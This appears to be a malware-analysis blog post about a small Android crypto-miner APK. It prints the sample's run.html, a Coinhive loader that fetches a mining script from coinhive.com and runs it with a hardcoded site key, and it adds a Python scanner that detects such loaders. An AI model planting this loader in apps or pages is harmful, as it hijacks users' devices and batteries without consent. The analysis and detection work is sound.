Fishing for Malware — Part Two: Android Crypto Miner | Sid's Blog


Information

Indicators of Compromise

File: 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 (SHA-256; see this file on VirusTotal)

As the heading and package name imply, this is a crypto miner developed for Android devices. However, that isn’t particularly interesting on its own, and 45.43 KB is small — suspiciously small — so let’s take a look inside the file.

Source

Extraction

$ unzip 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip 
Archive:  0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
  inflating: META-INF/MANIFEST.MF    
  inflating: META-INF/CERT.SF        
  inflating: META-INF/CERT.RSA       
 extracting: res/drawable-xhdpi-v4/ic_launcher.png  
  inflating: AndroidManifest.xml     
 extracting: res/drawable-hdpi-v4/ic_launcher.png  
  inflating: res/layout/activity_main.xml  
  inflating: assets/run.html         
 extracting: resources.arsc          
 extracting: res/drawable-mdpi-v4/ic_launcher.png  
  inflating: classes.dex             
 extracting: res/drawable-xxhdpi-v4/ic_launcher.png  
  inflating: res/menu/main.xml     
  
$

I see an HTML file, some PNG images, and some other files, the extensions of which I am not familiar with. Let’s check them out.

$ cat assets/run.html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE', {
        threads: 4,
        throttle: 0.8
    });
    miner.start();
</script>

Sigh. It remains boring. However, by searching for the crypto wallet hardcoded into the HTML, I came across a presentation from Fortinet, indicating that this CoinHive-related malware may have been a part of the Trinity Android P2P malware bot, which is quite interesting. Alas, that is a rabbit hole for another blog post.
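The check above (unzip the APK, look at the HTML asset, pull out the hardcoded key and miner settings) is easy to automate for triage. The following is an added example and not code from the original post: it builds a minimal APK-like zip in memory containing the run.html shown above, then scans every HTML/JS entry for known in-browser miner loader markers and extracts the site key, thread count and throttle. The marker list, the regexes and the zip construction are my assumptions; extend the marker list with your own intel.

```python
"""Triage an APK (a zip) for in-browser miner loaders such as the Coinhive
run.html above. Added example, not the original post's code."""
import io
import re
import zipfile
from typing import Dict, List, Optional

# Assumption: a short starter list of loader markers; extend as needed.
MINER_MARKERS = (
    "coinhive.com/lib/coinhive.min.js",
    "CoinHive.Anonymous",
    "CoinHive.User",
)

# Site key passed to the miner constructor, plus its tuning parameters.
KEY_RE = re.compile(r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9]+)['\"]")
THREADS_RE = re.compile(r"threads\s*:\s*(\d+)")
THROTTLE_RE = re.compile(r"throttle\s*:\s*([0-9.]+)")

# Constructed sample: the run.html from the post, as observed in the APK.
SAMPLE_RUN_HTML = """<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
        threads:4,
        throttle: 0.8
    });
    miner.start();
</script>
"""


def build_sample_apk() -> bytes:
    """Pack a minimal APK-like zip in memory (constructed, offline)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML stub
        z.writestr("assets/run.html", SAMPLE_RUN_HTML)
        z.writestr("classes.dex", b"dex\n035\x00")  # dex header stub
    return buf.getvalue()


def scan_apk(apk_bytes: bytes) -> List[Dict[str, Optional[object]]]:
    """Return one finding per HTML/JS entry that references a miner loader."""
    findings: List[Dict[str, Optional[object]]] = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith((".html", ".htm", ".js")):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            hits = [m for m in MINER_MARKERS if m in text]
            if not hits:
                continue
            key = KEY_RE.search(text)
            threads = THREADS_RE.search(text)
            throttle = THROTTLE_RE.search(text)
            findings.append({
                "path": name,
                "markers": hits,
                "site_key": key.group(1) if key else None,
                "threads": int(threads.group(1)) if threads else None,
                "throttle": float(throttle.group(1)) if throttle else None,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_apk(build_sample_apk()):
        print(finding)
```

Run it against a real sample by replacing `build_sample_apk()` with the bytes of the APK on disk; the extracted site key is the pivot you would search on, as the post does, to tie the sample to other campaigns.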

Each PNG was a rescaled version of the stock Android logo — not much to say beyond that.

How I assume this malware works:

  1. The app embeds the victim’s stock web browser in an app frame running in the background and loads run.html into it.

  2. Instructions are received from CoinHive.

  3. The miner starts working, sending proof of work to the address hardcoded into the script.

  4. The victim’s phone gets too hot, or the battery drains too fast; upon seeing the culprit as com.ufo.miner in the power report of the device, the victim promptly uninstalls the application.

Personal Thoughts

This is a very small application and doesn’t perform any particularly special operations; in fact, I debated including it in this series at all. More interesting than the malware itself to me, however, is the platform it targets.

In the context of cryptocurrency mining, Android devices are not particularly powerful, and therefore not as lucrative as most other computing machines. It would take a vast, vast array of Android smartphones/tablets/et cetera to generate even a moderate amount of the more popular cryptocurrencies available today, such as Bitcoin. This issue is exacerbated by the ease of detection; many users infected with this malware, I would reason, could trivially identify its existence via the power usage utility on their respective Android device, thereby shortening runtime.

A humorous reference to Coinhive’s coinhive.min.js script I found online: “Stack Overflow: [Coinhive header] automatically appears in my website”

And, finally, kudos to Troy Hunt, who bought the Coinhive domain and shut it down.

Thanks so much for reading!
